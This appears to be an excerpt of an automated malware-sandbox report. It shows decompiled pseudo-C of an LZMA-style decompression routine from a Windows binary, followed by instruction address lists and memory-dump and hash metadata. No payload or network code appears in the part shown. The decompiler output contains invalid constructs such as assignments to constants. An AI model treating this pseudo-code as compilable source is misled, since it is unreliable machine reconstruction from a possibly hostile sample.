                                                  											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                  											 *( *(__ebp - 0x68)) = __al;
                                                  											__ecx =  *(__ebp - 0x14);
                                                  											 *(__ecx +  *(__ebp - 8)) = __al;
                                                  											__eax = __ecx + 1;
                                                  											__edx = 0;
                                                  											_t192 = __eax %  *(__ebp - 0x74);
                                                  											__eax = __eax /  *(__ebp - 0x74);
                                                  											__edx = _t192;
                                                  											goto L80;
                                                  										case 0x1b:
                                                  											L76:
                                                  											__eflags =  *(__ebp - 0x64);
                                                  											if( *(__ebp - 0x64) == 0) {
                                                  												 *(__ebp - 0x88) = 0x1b;
                                                  												goto L170;
                                                  											}
                                                  											__eax =  *(__ebp - 0x14);
                                                  											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                  											__eflags = __eax -  *(__ebp - 0x74);
                                                  											if(__eax >=  *(__ebp - 0x74)) {
                                                  												__eax = __eax +  *(__ebp - 0x74);
                                                  												__eflags = __eax;
                                                  											}
                                                  											__edx =  *(__ebp - 8);
                                                  											__cl =  *(__eax + __edx);
                                                  											__eax =  *(__ebp - 0x14);
                                                  											 *(__ebp - 0x5c) = __cl;
                                                  											 *(__eax + __edx) = __cl;
                                                  											__eax = __eax + 1;
                                                  											__edx = 0;
                                                  											_t275 = __eax %  *(__ebp - 0x74);
                                                  											__eax = __eax /  *(__ebp - 0x74);
                                                  											__edx = _t275;
                                                  											__eax =  *(__ebp - 0x68);
                                                  											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                  											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                  											_t284 = __ebp - 0x64;
                                                  											 *_t284 =  *(__ebp - 0x64) - 1;
                                                  											__eflags =  *_t284;
                                                  											 *( *(__ebp - 0x68)) = __cl;
                                                  											L80:
                                                  											 *(__ebp - 0x14) = __edx;
                                                  											goto L81;
                                                  										case 0x1c:
                                                  											while(1) {
                                                  												L124:
                                                  												__eflags =  *(__ebp - 0x64);
                                                  												if( *(__ebp - 0x64) == 0) {
                                                  													break;
                                                  												}
                                                  												__eax =  *(__ebp - 0x14);
                                                  												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                  												__eflags = __eax -  *(__ebp - 0x74);
                                                  												if(__eax >=  *(__ebp - 0x74)) {
                                                  													__eax = __eax +  *(__ebp - 0x74);
                                                  													__eflags = __eax;
                                                  												}
                                                  												__edx =  *(__ebp - 8);
                                                  												__cl =  *(__eax + __edx);
                                                  												__eax =  *(__ebp - 0x14);
                                                  												 *(__ebp - 0x5c) = __cl;
                                                  												 *(__eax + __edx) = __cl;
                                                  												__eax = __eax + 1;
                                                  												__edx = 0;
                                                  												_t415 = __eax %  *(__ebp - 0x74);
                                                  												__eax = __eax /  *(__ebp - 0x74);
                                                  												__edx = _t415;
                                                  												__eax =  *(__ebp - 0x68);
                                                  												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                  												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                  												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                  												__eflags =  *(__ebp - 0x30);
                                                  												 *( *(__ebp - 0x68)) = __cl;
                                                  												 *(__ebp - 0x14) = _t415;
                                                  												if( *(__ebp - 0x30) > 0) {
                                                  													continue;
                                                  												} else {
                                                  													L81:
                                                  													 *(__ebp - 0x88) = 2;
                                                  													goto L1;
                                                  												}
                                                  											}
                                                  											 *(__ebp - 0x88) = 0x1c;
                                                  											L170:
                                                  											_push(0x22);
                                                  											_pop(_t567);
                                                  											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
                                                  											_t535 = 0;
                                                  											L172:
                                                  											return _t535;
                                                  									}
                                                  								}
                                                  								L171:
                                                  								_t535 = _t534 | 0xffffffff;
                                                  								goto L172;
                                                  							}
                                                  						}
                                                  						__eax =  *(__ebp - 0x50);
                                                  						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                  						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                  						__eax =  *(__ebp - 0x58);
                                                  						__esi = __edx + __eax;
                                                  						 *(__ebp - 0x54) = __esi;
                                                  						__ax =  *__esi;
                                                  						__edi = __ax & 0x0000ffff;
                                                  						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                  						if( *(__ebp - 0xc) >= __ecx) {
                                                  							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                  							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                  							__cx = __ax;
                                                  							__cx = __ax >> 5;
                                                  							__eax = __eax - __ecx;
                                                  							__edx = __edx + 1;
                                                  							 *__esi = __ax;
                                                  							 *(__ebp - 0x50) = __edx;
                                                  						} else {
                                                  							 *(__ebp - 0x10) = __ecx;
                                                  							0x800 = 0x800 - __edi;
                                                  							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                  							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                  							 *__esi = __cx;
                                                  						}
                                                  						if( *(__ebp - 0x10) >= 0x1000000) {
                                                  							goto L148;
                                                  						} else {
                                                  							goto L146;
                                                  						}
                                                  					}
                                                  					goto L1;
                                                  				}
                                                  			}








                                                  0x00406f82
                                                  0x00406f85
                                                  0x00406f89
                                                  0x00406f8c
                                                  0x00406f92
                                                  0x00406f94
                                                  0x00406f94
                                                  0x00406f94
                                                  0x00406f97
                                                  0x00406f9a
                                                  0x00406f9a
                                                  0x00406fa0
                                                  0x00406f3e
                                                  0x00406f3e
                                                  0x00406f41
                                                  0x00000000
                                                  0x00406f41
                                                  0x00406fa2
                                                  0x00406fa2
                                                  0x00406fa5
                                                  0x00406fa8
                                                  0x00406fab
                                                  0x00406fae
                                                  0x00406fb1
                                                  0x00406fb4
                                                  0x00406fb7
                                                  0x00406fba
                                                  0x00406fbd
                                                  0x00406fc0
                                                  0x00406fd8
                                                  0x00406fdb
                                                  0x00406fde
                                                  0x00406fe1
                                                  0x00406fe1
                                                  0x00406fe4
                                                  0x00406fe8
                                                  0x00406fea
                                                  0x00406fc2
                                                  0x00406fc2
                                                  0x00406fca
                                                  0x00406fcf
                                                  0x00406fd1
                                                  0x00406fd3
                                                  0x00406fd3
                                                  0x00406fed
                                                  0x00406ff4
                                                  0x00406ff7
                                                  0x00000000
                                                  0x00406ff9
                                                  0x00000000
                                                  0x00406ff9
                                                  0x00000000
                                                  0x00407286
                                                  0x00407286
                                                  0x0040728a
                                                  0x004075b1
                                                  0x00000000
                                                  0x004075b1
                                                  0x00407290
                                                  0x00407293
                                                  0x00407296
                                                  0x0040729a
                                                  0x0040729d
                                                  0x004072a3
                                                  0x004072a5
                                                  0x004072a5
                                                  0x004072a5
                                                  0x004072a8
                                                  0x00000000
                                                  0x00000000
                                                  0x00407056
                                                  0x00407056
                                                  0x00407059
                                                  0x004073cb
                                                  0x004073cb
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00407452
                                                  0x00407456
                                                  0x00407474
                                                  0x00407474
                                                  0x00407474
                                                  0x0040747b
                                                  0x00407482
                                                  0x00000000
                                                  0x00407482
                                                  0x00407458
                                                  0x0040745b
                                                  0x0040745e
                                                  0x00407461
                                                  0x00407468
                                                  0x00000000
                                                  0x00000000
                                                  0x00407543
                                                  0x00407546
                                                  0x00407447
                                                  0x00407447
                                                  0x00000000
                                                  0x00000000
                                                  0x0040717d
                                                  0x0040717f
                                                  0x00407186
                                                  0x00407187
                                                  0x00407189
                                                  0x0040718c
                                                  0x00000000
                                                  0x00000000
                                                  0x00407194
                                                  0x00407197
                                                  0x0040719a
                                                  0x0040719c
                                                  0x0040719e
                                                  0x0040719e
                                                  0x0040719f
                                                  0x004071a2
                                                  0x004071a9
                                                  0x004071ac
                                                  0x004071ba
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040749f
                                                  0x0040749f
                                                  0x004074a3
                                                  0x004075db
                                                  0x00000000
                                                  0x004075db
                                                  0x004074a9
                                                  0x004074ac
                                                  0x004074af
                                                  0x004074b3
                                                  0x004074b6
                                                  0x004074bc
                                                  0x004074be
                                                  0x004074be
                                                  0x004074be
                                                  0x004074c1
                                                  0x004074c4
                                                  0x004074c4
                                                  0x004074c4
                                                  0x004074c4
                                                  0x00000000
                                                  0x00000000
                                                  0x004071c2
                                                  0x004071c5
                                                  0x004071fb
                                                  0x0040732b
                                                  0x0040732b
                                                  0x0040732b
                                                  0x0040732b
                                                  0x0040732e
                                                  0x0040732e
                                                  0x00407331
                                                  0x00407333
                                                  0x004075bd
                                                  0x00000000
                                                  0x004075bd
                                                  0x00407339
                                                  0x0040733c
                                                  0x00000000
                                                  0x00000000
                                                  0x00407342
                                                  0x00407346
                                                  0x00407349
                                                  0x00407349
                                                  0x00407349
                                                  0x00000000
                                                  0x00407349
                                                  0x004071c7
                                                  0x004071c9
                                                  0x004071cb
                                                  0x004071cd
                                                  0x004071d0
                                                  0x004071d1
                                                  0x004071d3
                                                  0x004071d5
                                                  0x004071d8
                                                  0x004071db
                                                  0x004071f1
                                                  0x004071f6
                                                  0x0040722e
                                                  0x0040722e
                                                  0x00407232
                                                  0x0040725e
                                                  0x00407260
                                                  0x00407267
                                                  0x0040726a
                                                  0x0040726d
                                                  0x0040726d
                                                  0x00407272
                                                  0x00407272
                                                  0x00407274
                                                  0x00407277
                                                  0x0040727e
                                                  0x00407281
                                                  0x004072ae
                                                  0x004072ae
                                                  0x004072b1
                                                  0x004072b4
                                                  0x00407328
                                                  0x00407328
                                                  0x00407328
                                                  0x00000000
                                                  0x00407328
                                                  0x004072b6
                                                  0x004072bc
                                                  0x004072bf
                                                  0x004072c2
                                                  0x004072c5
                                                  0x004072c8
                                                  0x004072cb
                                                  0x004072ce
                                                  0x004072d1
                                                  0x004072d4
                                                  0x004072d7
                                                  0x004072f0
                                                  0x004072f2
                                                  0x004072f5
                                                  0x004072f6
                                                  0x004072f9
                                                  0x004072fb
                                                  0x004072fe
                                                  0x00407300
                                                  0x00407302
                                                  0x00407305
                                                  0x00407307
                                                  0x0040730a
                                                  0x0040730e
                                                  0x00407310
                                                  0x00407310
                                                  0x00407311
                                                  0x00407314
                                                  0x00407317
                                                  0x004072d9
                                                  0x004072d9
                                                  0x004072e1
                                                  0x004072e6
                                                  0x004072e8
                                                  0x004072eb
                                                  0x004072eb
                                                  0x0040731a
                                                  0x00407321
                                                  0x004072ab
                                                  0x004072ab
                                                  0x004072ab
                                                  0x004072ab
                                                  0x00000000
                                                  0x00407323
                                                  0x00000000
                                                  0x00407323
                                                  0x00407321
                                                  0x00407234
                                                  0x00407237
                                                  0x00407239
                                                  0x0040723c
                                                  0x0040723f
                                                  0x00407242
                                                  0x00407244
                                                  0x00407247
                                                  0x0040724a
                                                  0x0040724a
                                                  0x0040724d
                                                  0x0040724d
                                                  0x00407250
                                                  0x00407257
                                                  0x0040722b
                                                  0x0040722b
                                                  0x0040722b
                                                  0x0040722b
                                                  0x00000000
                                                  0x00407259
                                                  0x00000000
                                                  0x00407259
                                                  0x00407257
                                                  0x004071dd
                                                  0x004071e0
                                                  0x004071e2
                                                  0x004071e5
                                                  0x00000000
                                                  0x00000000
                                                  0x00406f44
                                                  0x00406f44
                                                  0x00406f48
                                                  0x0040758d
                                                  0x00000000
                                                  0x0040758d
                                                  0x00406f4e
                                                  0x00406f51
                                                  0x00406f54
                                                  0x00406f57
                                                  0x00406f5a
                                                  0x00406f5d
                                                  0x00406f60
                                                  0x00406f62
                                                  0x00406f65
                                                  0x00406f68
                                                  0x00406f6b
                                                  0x00406f6d
                                                  0x00406f6d
                                                  0x00406f6d
                                                  0x00000000
                                                  0x00000000
                                                  0x004070cf
                                                  0x004070cf
                                                  0x004070d3
                                                  0x00407599
                                                  0x00000000
                                                  0x00407599
                                                  0x004070d9
                                                  0x004070dc
                                                  0x004070df
                                                  0x004070e2
                                                  0x004070e4
                                                  0x004070e4
                                                  0x004070e4
                                                  0x004070e7
                                                  0x004070ea
                                                  0x004070ed
                                                  0x004070f0
                                                  0x004070f3
                                                  0x004070f6
                                                  0x004070f7
                                                  0x004070f9
                                                  0x004070f9
                                                  0x004070f9
                                                  0x004070fc
                                                  0x004070ff
                                                  0x00407102
                                                  0x00407105
                                                  0x00407105
                                                  0x00407105
                                                  0x00407108
                                                  0x0040710a
                                                  0x0040710a
                                                  0x00000000
                                                  0x00000000
                                                  0x0040734c
                                                  0x0040734c
                                                  0x0040734c
                                                  0x00407350
                                                  0x00000000
                                                  0x00000000
                                                  0x00407356
                                                  0x00407359
                                                  0x0040735c
                                                  0x0040735f
                                                  0x00407361
                                                  0x00407361
                                                  0x00407361
                                                  0x00407364
                                                  0x00407367
                                                  0x0040736a
                                                  0x0040736d
                                                  0x00407370
                                                  0x00407373
                                                  0x00407374
                                                  0x00407376
                                                  0x00407376
                                                  0x00407376
                                                  0x00407379
                                                  0x0040737c
                                                  0x0040737f
                                                  0x00407382
                                                  0x00407385
                                                  0x00407389
                                                  0x0040738b
                                                  0x0040738e
                                                  0x00000000
                                                  0x00407390
                                                  0x0040710d
                                                  0x0040710d
                                                  0x00000000
                                                  0x0040710d
                                                  0x0040738e
                                                  0x004075c3
                                                  0x004075e5
                                                  0x004075eb
                                                  0x004075ed
                                                  0x004075f4
                                                  0x004075f6
                                                  0x004075fd
                                                  0x00407601
                                                  0x00000000
                                                  0x00406bf2
                                                  0x004075fa
                                                  0x004075fa
                                                  0x00000000
                                                  0x004075fa
                                                  0x00407447
                                                  0x004074cd
                                                  0x004074d3
                                                  0x004074d6
                                                  0x004074d9
                                                  0x004074dc
                                                  0x004074df
                                                  0x004074e2
                                                  0x004074e5
                                                  0x004074e8
                                                  0x004074ee
                                                  0x00407507
                                                  0x0040750a
                                                  0x0040750d
                                                  0x00407510
                                                  0x00407514
                                                  0x00407516
                                                  0x00407517
                                                  0x0040751a
                                                  0x004074f0
                                                  0x004074f0
                                                  0x004074f8
                                                  0x004074fd
                                                  0x004074ff
                                                  0x00407502
                                                  0x00407502
                                                  0x00407524
                                                  0x00000000
                                                  0x00407526
                                                  0x00000000
                                                  0x00407526
                                                  0x00407524
                                                  0x00000000
                                                  0x00407399

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 97748a737734167d5846b9d8dd4738ada3f75d0b833fdafa89234df63502b4a5
                                                  • Instruction ID: d49815ad38d406b3cd0a1a90ea7be1526168d9e39684835ffa6a026ef1ef4849
                                                  • Opcode Fuzzy Hash: 97748a737734167d5846b9d8dd4738ada3f75d0b833fdafa89234df63502b4a5
                                                  • Instruction Fuzzy Hash: 91913270D04228DBEF28CF98C8547ADBBB1FF44305F14816AD856BB281D778A986DF45
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 98%
                                                  			E004070AB() {
                                                  				unsigned short _t532;
                                                  				signed int _t533;
                                                  				void _t534;
                                                  				void* _t535;
                                                  				signed int _t536;
                                                  				signed int _t565;
                                                  				signed int _t568;
                                                  				signed int _t589;
                                                  				signed int* _t606;
                                                  				void* _t613;
                                                  
                                                  				L0:
                                                  				while(1) {
                                                  					L0:
                                                  					if( *(_t613 - 0x40) != 0) {
                                                  						L89:
                                                  						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
                                                  						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
                                                  						L69:
                                                  						_t606 =  *(_t613 - 0x58);
                                                  						 *(_t613 - 0x84) = 0x12;
                                                  						L132:
                                                  						 *(_t613 - 0x54) = _t606;
                                                  						L133:
                                                  						_t532 =  *_t606;
                                                  						_t589 = _t532 & 0x0000ffff;
                                                  						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                  						if( *(_t613 - 0xc) >= _t565) {
                                                  							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                  							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                  							 *(_t613 - 0x40) = 1;
                                                  							_t533 = _t532 - (_t532 >> 5);
                                                  							 *_t606 = _t533;
                                                  						} else {
                                                  							 *(_t613 - 0x10) = _t565;
                                                  							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                  							 *_t606 = (0x800 - _t589 >> 5) + _t532;
                                                  						}
                                                  						if( *(_t613 - 0x10) >= 0x1000000) {
                                                  							L139:
                                                  							_t534 =  *(_t613 - 0x84);
                                                  							L140:
                                                  							 *(_t613 - 0x88) = _t534;
                                                  							goto L1;
                                                  						} else {
                                                  							L137:
                                                  							if( *(_t613 - 0x6c) == 0) {
                                                  								 *(_t613 - 0x88) = 5;
                                                  								goto L170;
                                                  							}
                                                  							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                                                  							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                  							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                  							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                  							goto L139;
                                                  						}
                                                  					} else {
                                                  						if( *(__ebp - 0x60) == 0) {
                                                  							L171:
                                                  							_t536 = _t535 | 0xffffffff;
                                                  							L172:
                                                  							return _t536;
                                                  						}
                                                  						__eax = 0;
                                                  						_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                  						0 | _t258 = _t258 + _t258 + 9;
                                                  						 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                  						L75:
                                                  						if( *(__ebp - 0x64) == 0) {
                                                  							 *(__ebp - 0x88) = 0x1b;
                                                  							L170:
                                                  							_t568 = 0x22;
                                                  							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                                                  							_t536 = 0;
                                                  							goto L172;
                                                  						}
                                                  						__eax =  *(__ebp - 0x14);
                                                  						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                  						if(__eax >=  *(__ebp - 0x74)) {
                                                  							__eax = __eax +  *(__ebp - 0x74);
                                                  						}
                                                  						__edx =  *(__ebp - 8);
                                                  						__cl =  *(__eax + __edx);
                                                  						__eax =  *(__ebp - 0x14);
                                                  						 *(__ebp - 0x5c) = __cl;
                                                  						 *(__eax + __edx) = __cl;
                                                  						__eax = __eax + 1;
                                                  						__edx = 0;
                                                  						_t274 = __eax %  *(__ebp - 0x74);
                                                  						__eax = __eax /  *(__ebp - 0x74);
                                                  						__edx = _t274;
                                                  						__eax =  *(__ebp - 0x68);
                                                  						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                  						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                  						_t283 = __ebp - 0x64;
                                                  						 *_t283 =  *(__ebp - 0x64) - 1;
                                                  						 *( *(__ebp - 0x68)) = __cl;
                                                  						L79:
                                                  						 *(__ebp - 0x14) = __edx;
                                                  						L80:
                                                  						 *(__ebp - 0x88) = 2;
                                                  					}
                                                  					L1:
                                                  					_t535 =  *(_t613 - 0x88);
                                                  					if(_t535 > 0x1c) {
                                                  						goto L171;
                                                  					}
                                                  					switch( *((intOrPtr*)(_t535 * 4 +  &M00407602))) {
                                                  						case 0:
                                                  							if( *(_t613 - 0x6c) == 0) {
                                                  								goto L170;
                                                  							}
                                                  							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                  							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                  							_t535 =  *( *(_t613 - 0x70));
                                                  							if(_t535 > 0xe1) {
                                                  								goto L171;
                                                  							}
                                                  							_t539 = _t535 & 0x000000ff;
                                                  							_push(0x2d);
                                                  							asm("cdq");
                                                  							_pop(_t570);
                                                  							_push(9);
                                                  							_pop(_t571);
                                                  							_t609 = _t539 / _t570;
                                                  							_t541 = _t539 % _t570 & 0x000000ff;
                                                  							asm("cdq");
                                                  							_t604 = _t541 % _t571 & 0x000000ff;
                                                  							 *(_t613 - 0x3c) = _t604;
                                                  							 *(_t613 - 0x1c) = (1 << _t609) - 1;
                                                  							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
                                                  							_t612 = (0x300 << _t604 + _t609) + 0x736;
                                                  							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                                                  								L10:
                                                  								if(_t612 == 0) {
                                                  									L12:
                                                  									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                                                  									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                  									goto L15;
                                                  								} else {
                                                  									goto L11;
                                                  								}
                                                  								do {
                                                  									L11:
                                                  									_t612 = _t612 - 1;
                                                  									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                                                  								} while (_t612 != 0);
                                                  								goto L12;
                                                  							}
                                                  							if( *(_t613 - 4) != 0) {
                                                  								GlobalFree( *(_t613 - 4));
                                                  							}
                                                  							_t535 = GlobalAlloc(0x40, 0x600); // executed
                                                  							 *(_t613 - 4) = _t535;
                                                  							if(_t535 == 0) {
                                                  								goto L171;
                                                  							} else {
                                                  								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                                                  								goto L10;
                                                  							}
                                                  						case 1:
                                                  							L13:
                                                  							__eflags =  *(_t613 - 0x6c);
                                                  							if( *(_t613 - 0x6c) == 0) {
                                                  								 *(_t613 - 0x88) = 1;
                                                  								goto L170;
                                                  							}
                                                  							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                  							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                                                  							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                  							_t45 = _t613 - 0x48;
                                                  							 *_t45 =  *(_t613 - 0x48) + 1;
                                                  							__eflags =  *_t45;
                                                  							L15:
                                                  							if( *(_t613 - 0x48) < 4) {
                                                  								goto L13;
                                                  							}
                                                  							_t547 =  *(_t613 - 0x40);
                                                  							if(_t547 ==  *(_t613 - 0x74)) {
                                                  								L20:
                                                  								 *(_t613 - 0x48) = 5;
                                                  								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                                                  								goto L23;
                                                  							}
                                                  							 *(_t613 - 0x74) = _t547;
                                                  							if( *(_t613 - 8) != 0) {
                                                  								GlobalFree( *(_t613 - 8));
                                                  							}
                                                  							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                                                  							 *(_t613 - 8) = _t535;
                                                  							if(_t535 == 0) {
                                                  								goto L171;
                                                  							} else {
                                                  								goto L20;
                                                  							}
                                                  						case 2:
                                                  							L24:
                                                  							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                                                  							 *(_t613 - 0x84) = 6;
                                                  							 *(_t613 - 0x4c) = _t554;
                                                  							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
                                                  							goto L132;
                                                  						case 3:
                                                  							L21:
                                                  							__eflags =  *(_t613 - 0x6c);
                                                  							if( *(_t613 - 0x6c) == 0) {
                                                  								 *(_t613 - 0x88) = 3;
                                                  								goto L170;
                                                  							}
                                                  							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                  							_t67 = _t613 - 0x70;
                                                  							 *_t67 =  &(( *(_t613 - 0x70))[1]);
                                                  							__eflags =  *_t67;
                                                  							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                  							L23:
                                                  							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                                                  							if( *(_t613 - 0x48) != 0) {
                                                  								goto L21;
                                                  							}
                                                  							goto L24;
                                                  						case 4:
                                                  							goto L133;
                                                  						case 5:
                                                  							goto L137;
                                                  						case 6:
                                                  							__edx = 0;
                                                  							__eflags =  *(__ebp - 0x40);
                                                  							if( *(__ebp - 0x40) != 0) {
                                                  								__eax =  *(__ebp - 4);
                                                  								__ecx =  *(__ebp - 0x38);
                                                  								 *(__ebp - 0x34) = 1;
                                                  								 *(__ebp - 0x84) = 7;
                                                  								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                  								goto L132;
                                                  							}
                                                  							__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                  							__esi =  *(__ebp - 0x60);
                                                  							__cl = 8;
                                                  							__cl = 8 -  *(__ebp - 0x3c);
                                                  							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                  							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                  							__ecx =  *(__ebp - 0x3c);
                                                  							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                  							__ecx =  *(__ebp - 4);
                                                  							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                  							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                  							__eflags =  *(__ebp - 0x38) - 4;
                                                  							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                  							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                  							if( *(__ebp - 0x38) >= 4) {
                                                  								__eflags =  *(__ebp - 0x38) - 0xa;
                                                  								if( *(__ebp - 0x38) >= 0xa) {
                                                  									_t98 = __ebp - 0x38;
                                                  									 *_t98 =  *(__ebp - 0x38) - 6;
                                                  									__eflags =  *_t98;
                                                  								} else {
                                                  									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                  								}
                                                  							} else {
                                                  								 *(__ebp - 0x38) = 0;
                                                  							}
                                                  							__eflags =  *(__ebp - 0x34) - __edx;
                                                  							if( *(__ebp - 0x34) == __edx) {
                                                  								__ebx = 0;
                                                  								__ebx = 1;
                                                  								goto L61;
                                                  							} else {
                                                  								__eax =  *(__ebp - 0x14);
                                                  								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                  								__eflags = __eax -  *(__ebp - 0x74);
                                                  								if(__eax >=  *(__ebp - 0x74)) {
                                                  									__eax = __eax +  *(__ebp - 0x74);
                                                  									__eflags = __eax;
                                                  								}
                                                  								__ecx =  *(__ebp - 8);
                                                  								__ebx = 0;
                                                  								__ebx = 1;
                                                  								__al =  *((intOrPtr*)(__eax + __ecx));
                                                  								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                  								goto L41;
                                                  							}
                                                  						case 7:
                                                  							__eflags =  *(__ebp - 0x40) - 1;
                                                  							if( *(__ebp - 0x40) != 1) {
                                                  								__eax =  *(__ebp - 0x24);
                                                  								 *(__ebp - 0x80) = 0x16;
                                                  								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                  								__eax =  *(__ebp - 0x28);
                                                  								 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                  								__eax =  *(__ebp - 0x2c);
                                                  								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                  								__eax = 0;
                                                  								__eflags =  *(__ebp - 0x38) - 7;
                                                  								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                  								__al = __al & 0x000000fd;
                                                  								__eax = (__eflags >= 0) - 1 + 0xa;
                                                  								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                  								__eax =  *(__ebp - 4);
                                                  								__eax =  *(__ebp - 4) + 0x664;
                                                  								__eflags = __eax;
                                                  								 *(__ebp - 0x58) = __eax;
